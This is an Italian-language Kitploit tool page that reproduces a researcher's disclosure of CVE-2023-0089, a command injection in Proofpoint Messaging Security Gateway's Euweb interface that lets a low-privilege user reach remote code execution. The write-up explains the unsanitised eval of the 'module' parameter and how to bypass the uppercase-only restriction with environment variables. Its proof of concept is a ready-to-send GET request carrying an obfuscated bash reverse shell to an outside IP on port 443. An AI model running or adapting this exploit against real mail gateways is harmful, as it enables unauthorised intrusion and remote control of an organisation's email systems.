Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
proofpoint-CVE-2023-0089 — Proofpoint Email Gateway: da utente autenticato di basso livello a RCE con privilegi di amministratore | Kitploit
Strumenti/GitHubGitHub/ly1g3/proofpoint-cve-2023-0089
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlSviluppo Payload
GitHubly1g3/proofpoint-cve-2023-0089

proofpoint-CVE-2023-0089

Proofpoint Email Gateway: da utente autenticato di basso livello a RCE con privilegi di amministratore

Vedi Repository
112 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Informazioni

Ricercatore di sicurezza: ly1g3, ly1g3[at]tuta.io

Impronta GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Panoramica: Esecuzione remota di codice - da utente autenticato di basso livello a RCE con privilegi di amministratore

CVE: CVE-2023-0089

Cronologia:

  • Scoperto - ly1g3
  • Segnalato - ly1g3
  • Corretto - Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

Exploit per Proofpoint Messaging Security Gateway

Esecuzione remota di codice (RCE)

Un utente di basso livello (autenticato) di Euweb può ottenere l'esecuzione arbitraria di codice con privilegi di amministratore.

Dettagli tecnici

La funzione getMsgType in Euwebutils.pm è vulnerabile all'iniezione di comandi. La variabile $module proviene da un parametro GET e non viene applicata alcuna sanitizzazione a questo input utente.

root@kitploit:~
sub getMsgType {
...
else {
		$msgtype = eval "Proofpoint::Digest::PROOFPOINT_MAIL_REPORT_MSGTYPE_".uc($module);
	}

Questa funzione getMsgType è utilizzata da molte chiamate API impiegate dall'applicazione Euweb, quindi l'exploit può essere attivato in molti modi.

Poiché tutti i caratteri devono essere maiuscoli, si possono usare le variabili d'ambiente per aggirare questa restrizione per le lettere minuscole. Esempio: ${SHELL:1:1} invece di b

Poiché viene usato use strict, MAIL_GENERAL() può essere aggiunto all'inizio della stringa per completare PROOFPOINT_MAIL_REPORT_MSGTYPE_. Dopo di che può essere aggiunto codice Perl personalizzato.

Esempio di payload non codificato: MAIL_GENERAL();`id`

POC

Reverse shell codificata usando variabili d'ambiente per aggirare le restrizioni sulle lettere minuscole. Codice eseguito come utente pps.

root@kitploit:~
GET /euweb/euweb?cmd=x_releasemsg&id=0&func=ReleaseMsg&entries=23%3A23%3A12&eid=3&module=MAIL_GENERAL()%3b`/\${SHELL%3a1%3a1}\${SHELL%3a2%3a1}\${LANG%3a1%3a1}/\${USER%3a2%3a1}\${SHELL%3a8%3a1}+-\${SHELL%3a2%3a1}+>%26+/\${SSH_TTY%3a1%3a1}\${TERM%3a2%3a1}\${MAIL%3a1%3a1}/\${TERM%3a1%3a1}\${TERM%3a9%3a1}\${USER%3a0%3a1}/192.168.80.81/443+0>%261`
Scarica lo strumento